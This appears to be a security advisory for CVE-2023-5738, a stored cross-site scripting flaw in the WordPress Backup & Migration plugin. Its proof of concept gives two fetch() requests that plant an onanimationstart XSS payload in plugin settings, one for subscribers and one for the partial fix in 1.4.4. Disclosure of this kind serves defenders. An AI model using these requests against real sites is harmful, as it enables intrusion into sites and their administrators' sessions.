WordPress Backup & Migration < 1.4.5 – Subscriber+ Stored XSS | CVE 2023-5738

Description

The plugin does not sanitise and escape some parameters, which could allow users with a role as low as Subscriber to perform Cross-Site Scripting attacks.

This was partially fixed in version 1.4.4 but it still allowed XSS attacks from Admin users.

Proof of Concept

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "settings_data%5Bim_data_size_per_req%5D=1&settings_data%5Bim_db_file_per_req%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)+x&action=mgdp_plugin_save_import_settings",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

Then the admin needs to click http://127.0.0.1:8001/wp-admin/admin.php?page=wp-migration-duplicator#wt-mgdp-import -> advanced options
---
On version 1.4.4, a site admin must run the following command on the Backup & Migration page:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "settings_data%5Bim_data_size_per_req%5D=1&settings_data%5Bim_db_file_per_req%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)+x&action=mgdp_plugin_save_import_settings&_wpnonce=" + wp_migration_duplicator_import.nonces.main,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})